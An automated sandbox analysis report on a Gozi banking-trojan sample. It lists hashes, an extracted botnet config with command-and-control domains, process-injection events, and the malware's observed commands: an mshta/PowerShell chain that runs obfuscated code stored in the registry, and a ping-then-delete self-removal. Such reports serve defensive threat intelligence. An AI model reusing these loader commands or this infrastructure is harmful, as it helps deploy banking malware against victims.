gozi | 64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6

Analysis

max time kernel
151s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20230915-en
resource tags

arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
submitted
11-10-2023 06:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6_JC.exe
Size

181KB
MD5

e54d9f8d9757fe6eead98ab59bd59ffa
SHA1

60c8766682b968d9367f9099378f2c9f0ed07278
SHA256

64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6
SHA512

b362675e7c21b0336ed5844ed453334bd93257ea6901fed5b532d06db54ad775c33c17c753414f34c8c9117ce38cc072a4b59deeb7add1ea76b63183948f511e
SSDEEP

3072:+gZW8+P3NtOTH8CG95Ja4tXybaVLbPkxAgaX6wwzCqIg9:+SWfPLOL85hlVfjRSIg9

Score

10^/10

gozi 5050 banker dave isfb trojan

Malware Config

Extracted

Family

gozi

Extracted

Family

gozi

Botnet

5050

netsecurez.com

whofoxy.com

mimemoa.com

ntcgo.com

Attributes

base_path
/jerry/
build
250260
exe_type
loader
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Extracted

Family

gozi

Botnet

5050

fotexion.com

Attributes

base_path
/pictures/
build
250260
exe_type
worker
extension
.bob
server_id
50

rsa_pubkey.plain

aes.plain

Signatures

Gozi
Gozi is a well-known and widely distributed banking trojan.
banker trojan gozi

Dave packer 1 IoCs

Detects executable using a packer named 'Dave' by the community, based on a string at the end.

dave

Processes:

resource	yara_rule
behavioral2/memory/468-0-0x00000000015B0000-0x00000000015BC000-memory.dmp	dave

Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

mshta.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation mshta.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation	mshta.exe

Suspicious use of SetThreadContext 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 2388 set thread context of 3156	2388	powershell.exe	Explorer.EXE
PID 3156 set thread context of 3752	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 set thread context of 3984	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 set thread context of 1968	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 set thread context of 3856	3156	Explorer.EXE	cmd.exe
PID 3156 set thread context of 4988	3156	Explorer.EXE	RuntimeBroker.exe
PID 3856 set thread context of 1076	3856	cmd.exe	PING.EXE
PID 3156 set thread context of 884	3156	Explorer.EXE	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

1076 PING.EXE
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

PING.EXE

pid process

1076 PING.EXE

pid	process
1076	PING.EXE

pid	process
1076	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6_JC.exepowershell.exeExplorer.EXE

pid	process
468	64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6_JC.exe
468	64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6_JC.exe
2388	powershell.exe
2388	powershell.exe
2388	powershell.exe
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3156 Explorer.EXE
Suspicious behavior: MapViewOfSection 8 IoCs

Processes:

powershell.exeExplorer.EXEcmd.exe

pid process

2388 powershell.exe
3156 Explorer.EXE
3156 Explorer.EXE
3156 Explorer.EXE
3156 Explorer.EXE
3156 Explorer.EXE
3156 Explorer.EXE
3856 cmd.exe

pid	process
3156	Explorer.EXE

pid	process
2388	powershell.exe
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3156	Explorer.EXE
3856	cmd.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exeExplorer.EXERuntimeBroker.exe

description	pid	process
Token: SeDebugPrivilege	2388	powershell.exe
Token: SeShutdownPrivilege	3156	Explorer.EXE
Token: SeCreatePagefilePrivilege	3156	Explorer.EXE
Token: SeShutdownPrivilege	3156	Explorer.EXE
Token: SeCreatePagefilePrivilege	3156	Explorer.EXE
Token: SeShutdownPrivilege	3156	Explorer.EXE
Token: SeCreatePagefilePrivilege	3156	Explorer.EXE
Token: SeShutdownPrivilege	3752	RuntimeBroker.exe
Token: SeShutdownPrivilege	3156	Explorer.EXE
Token: SeCreatePagefilePrivilege	3156	Explorer.EXE

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

Explorer.EXE

pid process

3156 Explorer.EXE
Suspicious use of UnmapMainImage 2 IoCs

Processes:

Explorer.EXERuntimeBroker.exe

pid process

3156 Explorer.EXE
3752 RuntimeBroker.exe

pid	process
3156	Explorer.EXE

pid	process
3156	Explorer.EXE
3752	RuntimeBroker.exe

Suspicious use of WriteProcessMemory 46 IoCs

Processes:

mshta.exepowershell.execsc.execsc.exeExplorer.EXEcmd.exe

description	pid	process	target process
PID 3268 wrote to memory of 2388	3268	mshta.exe	powershell.exe
PID 3268 wrote to memory of 2388	3268	mshta.exe	powershell.exe
PID 2388 wrote to memory of 3540	2388	powershell.exe	csc.exe
PID 2388 wrote to memory of 3540	2388	powershell.exe	csc.exe
PID 3540 wrote to memory of 4856	3540	csc.exe	cvtres.exe
PID 3540 wrote to memory of 4856	3540	csc.exe	cvtres.exe
PID 2388 wrote to memory of 4352	2388	powershell.exe	csc.exe
PID 2388 wrote to memory of 4352	2388	powershell.exe	csc.exe
PID 4352 wrote to memory of 3796	4352	csc.exe	cvtres.exe
PID 4352 wrote to memory of 3796	4352	csc.exe	cvtres.exe
PID 2388 wrote to memory of 3156	2388	powershell.exe	Explorer.EXE
PID 2388 wrote to memory of 3156	2388	powershell.exe	Explorer.EXE
PID 2388 wrote to memory of 3156	2388	powershell.exe	Explorer.EXE
PID 2388 wrote to memory of 3156	2388	powershell.exe	Explorer.EXE
PID 3156 wrote to memory of 3752	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3752	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3856	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 3856	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 3856	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 3752	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3752	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3984	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3984	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3984	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3984	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 1968	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 1968	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 1968	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3856	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 1968	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4988	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4988	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 3856	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 4988	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 4988	3156	Explorer.EXE	RuntimeBroker.exe
PID 3156 wrote to memory of 884	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 884	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 884	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 884	3156	Explorer.EXE	cmd.exe
PID 3856 wrote to memory of 1076	3856	cmd.exe	PING.EXE
PID 3856 wrote to memory of 1076	3856	cmd.exe	PING.EXE
PID 3856 wrote to memory of 1076	3856	cmd.exe	PING.EXE
PID 3856 wrote to memory of 1076	3856	cmd.exe	PING.EXE
PID 3156 wrote to memory of 884	3156	Explorer.EXE	cmd.exe
PID 3156 wrote to memory of 884	3156	Explorer.EXE	cmd.exe
PID 3856 wrote to memory of 1076	3856	cmd.exe	PING.EXE

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:1968

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3984

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:3752

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
- Suspicious use of WriteProcessMemory
PID:3156

C:\Users\Admin\AppData\Local\Temp\64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6_JC.exe
"C:\Users\Admin\AppData\Local\Temp\64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6_JC.exe"
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:468

C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Gupb='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Gupb).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F\\\MemoryMusic'));if(!window.flag)close()</script>"
2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3268

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name ckmljhco -value gp; new-alias -name ekhcthttr -value iex; ekhcthttr ([System.Text.Encoding]::ASCII.GetString((ckmljhco "HKCU:Software\AppDataLow\Software\Microsoft\2D69E7DB-A838-E7C3-1AB1-5C0BEE75506F").LinkAbout))
3⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2388

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\at3ulcgj\at3ulcgj.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:3540

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5EF4.tmp" "c:\Users\Admin\AppData\Local\Temp\at3ulcgj\CSCB952F66E9584914A17C20C81E9EB47.TMP"
5⤵
PID:4856

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\co2u4i12\co2u4i12.cmdline"
4⤵
- Suspicious use of WriteProcessMemory
PID:4352

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES602C.tmp" "c:\Users\Admin\AppData\Local\Temp\co2u4i12\CSC794E68563014425A998226E45A1626A.TMP"
5⤵
PID:3796

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\64eee9187e295afcb6989200de6fef6ca563d48881784c38765e5cc590e55ad6_JC.exe"
2⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:3856

C:\Windows\system32\PING.EXE
ping localhost -n 5
3⤵
- Runs ping.exe
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1076

C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
2⤵
PID:884

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES5EF4.tmp

Filesize
1KB

MD5
273028ce6e58ae2a20b65e874baf5e5a

SHA1
3e97cb43e6b2574ab0a6b1c7f631dd6e23bcc1d7

SHA256
4743498980b61bc8cd6e1e17a19c711450fc3898cc49d6f8813c6bafb3c8efc6

SHA512
e18a238a764bd01fd8cc8b1f0a5e35a2861aeec9b950485c3bb2638e149292c1f510a319e8eb19e0fd90063356305a647b380624bd202bcb7a01aa916e992fba

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES602C.tmp

Filesize
1KB

MD5
e0d2b2355235df907c5801d3b0f2c8d9

SHA1
542b19be011a6dadec9eec97c18da29a675c6102

SHA256
354c11fe666466e08c1cd08347c9a9549fd65ae9a75a3282fd9c999f36bc9763

SHA512
54488d87533fe59d127a8b5802ef18c273ee85f0cb3d709c39dec67f7bfb293096225ad001bf4f2534258bbc8ae594d00f05d8351c6623f778b52c32cc7e8ea7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tone4skn.4vp.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\at3ulcgj\at3ulcgj.dll

Filesize
3KB

MD5
b9110273018689e6763954cf32c44427

SHA1
51d347bece6e2d42a68d423b791683032aa6fef4

SHA256
dad68443d8bda259c7e7734ba2985cc1a40e12350356826083403d4e47a62fce

SHA512
dabe018cc2c88b98624f343e35e14c2a188441e5d885643e9efd105ca97864674424325161a20212d0002061a8be021ca4c1222aa8fc06c02377564dfe1fd2b8

Download Submit
C:\Users\Admin\AppData\Local\Temp\co2u4i12\co2u4i12.dll

Filesize
3KB

MD5
c1224bf8a32ea064f8bbd78b8908acdd

SHA1
86f48adb3197b907a2641fbfb1b0c78a4c37f642

SHA256
da8899b6a996af787a1259506d14d473a1c40de7e3b2d6db972f78bfcdd648d5

SHA512
388049dd68f64927c25b88402e11a46123f035cd31042fdeeec342241af956316593a48936fbc4baffd564759e149e0fab3e09910b19f94a50dd39fac730d3d5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\at3ulcgj\CSCB952F66E9584914A17C20C81E9EB47.TMP

Filesize
652B

MD5
f0e9c194cd619bcbf9f3f04e4bee5994

SHA1
3197613d942d25380f2ced9238f63b9ba1d3ff6d

SHA256
69ce3854104c07f624aee138256ed695a8a4ddf3727916562ad054e697fb1710

SHA512
44456f128f552ac3b58f33c604532e62ba120e059fcacfe9d37de70d4ed7fe33a5bd840ce093fe993ddd6e09de90cd360c36e81a69223629d0cd9240d991d851

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\at3ulcgj\at3ulcgj.0.cs

Filesize
405B

MD5
caed0b2e2cebaecd1db50994e0c15272

SHA1
5dfac9382598e0ad2e700de4f833de155c9c65fa

SHA256
21210b9baafb8b03ab0ef625312973a77bb5aba856c91892b65826e8b7c3b150

SHA512
86dc4f8cedd37464c9c492c467375d4603715e5827dfaf7bfcfe5c46ce5e09b439139d4b0a756afa37e4c2444c5b169ac1c024217b9ba449edb183a3b53f2b62

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\at3ulcgj\at3ulcgj.cmdline

Filesize
369B

MD5
4d47f40083368f3621b7a49ee5a1f7a5

SHA1
8c0234ed885e50c1e4357b899ca4b6f2d80acfcb

SHA256
07a101cca39ef2caac30298efafdc5f17ecd94e240f6b40f0a0922e3d7470fff

SHA512
163a54a9ed618f6b3360ff12592e1f7da81d79b40c994bd3d4577ed5503213f4211d81c43a534d4645f52102e87711233479dace313b25655b869aa36393c688

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\co2u4i12\CSC794E68563014425A998226E45A1626A.TMP

Filesize
652B

MD5
c9435557dfe2e8c40c565d42cf8a2f59

SHA1
d6c931ef779fd9cbda9e02a55f725aab43f598ad

SHA256
cd1395cf563c8f829d8d1bd57694d24282aba7b0026531e5d99bb62a7051f344

SHA512
b23536311025077d82c226cac06b0ef6ef383e3bbda910e329c9806ffa6242829c4253ab5d987c284564054da0670303b8986d2fcbd7983baa9f687a650d652f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\co2u4i12\co2u4i12.0.cs

Filesize
406B

MD5
ca8887eacd573690830f71efaf282712

SHA1
0acd4f49fc8cf6372950792402ec3aeb68569ef8

SHA256
568b0c1155379c88e91f904f4e70a3608fbf664ef890309cd705a7c5eb3232c3

SHA512
2a538a308db6c7d09224737f549d442b4c206e8e9605a2570149243ee11bf0c5f028ebf003b383f86709d0dd976ff66d15ccb700f50969ff3da64dd39cab25c7

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\co2u4i12\co2u4i12.cmdline

Filesize
369B

MD5
5893bf3b8b87d687fb1daeb315c1d155

SHA1
fa65295c439d63b2033111fa104afa831efe4855

SHA256
9bb5716194434b9c7ff32999c11877c989f8d25b9609810c881e1884788d9b69

SHA512
a8cc0c9bb2494f1ddccd7bda01c76019d5cc0e9eb5d5c059f67949d38a632658febe36a15799d5d7463800a7a86af41c7c9886ccc736b91c78cb8689fce8df6a

Download Submit
memory/468-1-0x00000000015C0000-0x00000000015CF000-memory.dmp

Filesize
60KB

Download
memory/468-11-0x00000000015F0000-0x00000000015FD000-memory.dmp

Filesize
52KB

Download
memory/468-5-0x0000000000400000-0x000000000040F000-memory.dmp

Filesize
60KB

Download
memory/468-0-0x00000000015B0000-0x00000000015BC000-memory.dmp

Filesize
48KB

Download
memory/884-106-0x0000000001150000-0x00000000011E8000-memory.dmp

Filesize
608KB

Download
memory/884-111-0x00000000009F0000-0x00000000009F1000-memory.dmp

Filesize
4KB

Download
memory/884-115-0x0000000001150000-0x00000000011E8000-memory.dmp

Filesize
608KB

Download
memory/1076-108-0x00000209664B0000-0x00000209664B1000-memory.dmp

Filesize
4KB

Download
memory/1076-107-0x0000020966530000-0x00000209665D4000-memory.dmp

Filesize
656KB

Download
memory/1076-118-0x0000020966530000-0x00000209665D4000-memory.dmp

Filesize
656KB

Download
memory/1968-87-0x000001E1C81C0000-0x000001E1C81C1000-memory.dmp

Filesize
4KB

Download
memory/1968-85-0x000001E1C8910000-0x000001E1C89B4000-memory.dmp

Filesize
656KB

Download
memory/1968-120-0x000001E1C8910000-0x000001E1C89B4000-memory.dmp

Filesize
656KB

Download
memory/2388-20-0x000001D650DF0000-0x000001D650E12000-memory.dmp

Filesize
136KB

Download
memory/2388-70-0x00007FF9A70B0000-0x00007FF9A7B71000-memory.dmp

Filesize
10.8MB

Download
memory/2388-71-0x000001D650E80000-0x000001D650EBD000-memory.dmp

Filesize
244KB

Download
memory/2388-57-0x000001D650E80000-0x000001D650EBD000-memory.dmp

Filesize
244KB

Download
memory/2388-55-0x000001D650E70000-0x000001D650E78000-memory.dmp

Filesize
32KB

Download
memory/2388-28-0x000001D650ED0000-0x000001D650EE0000-memory.dmp

Filesize
64KB

Download
memory/2388-25-0x00007FF9A70B0000-0x00007FF9A7B71000-memory.dmp

Filesize
10.8MB

Download
memory/2388-41-0x000001D6388E0000-0x000001D6388E8000-memory.dmp

Filesize
32KB

Download
memory/2388-27-0x000001D650ED0000-0x000001D650EE0000-memory.dmp

Filesize
64KB

Download
memory/2388-26-0x000001D650ED0000-0x000001D650EE0000-memory.dmp

Filesize
64KB

Download
memory/3156-60-0x0000000002ED0000-0x0000000002ED1000-memory.dmp

Filesize
4KB

Download
memory/3156-59-0x0000000008E60000-0x0000000008F04000-memory.dmp

Filesize
656KB

Download
memory/3156-105-0x0000000008E60000-0x0000000008F04000-memory.dmp

Filesize
656KB

Download
memory/3752-116-0x0000029E95140000-0x0000029E951E4000-memory.dmp

Filesize
656KB

Download
memory/3752-73-0x0000029E95140000-0x0000029E951E4000-memory.dmp

Filesize
656KB

Download
memory/3752-74-0x0000029E93ED0000-0x0000029E93ED1000-memory.dmp

Filesize
4KB

Download
memory/3856-92-0x000001E8EC660000-0x000001E8EC661000-memory.dmp

Filesize
4KB

Download
memory/3856-86-0x000001E8EC7D0000-0x000001E8EC874000-memory.dmp

Filesize
656KB

Download
memory/3856-119-0x000001E8EC7D0000-0x000001E8EC874000-memory.dmp

Filesize
656KB

Download
memory/3984-78-0x0000022889280000-0x0000022889324000-memory.dmp

Filesize
656KB

Download
memory/3984-117-0x0000022889280000-0x0000022889324000-memory.dmp

Filesize
656KB

Download
memory/3984-80-0x0000022889240000-0x0000022889241000-memory.dmp

Filesize
4KB

Download
memory/4988-96-0x0000024C1BED0000-0x0000024C1BED1000-memory.dmp

Filesize
4KB

Download
memory/4988-95-0x0000024C1BE20000-0x0000024C1BEC4000-memory.dmp

Filesize
656KB

Download
memory/4988-121-0x0000024C1BE20000-0x0000024C1BEC4000-memory.dmp

Filesize
656KB

Download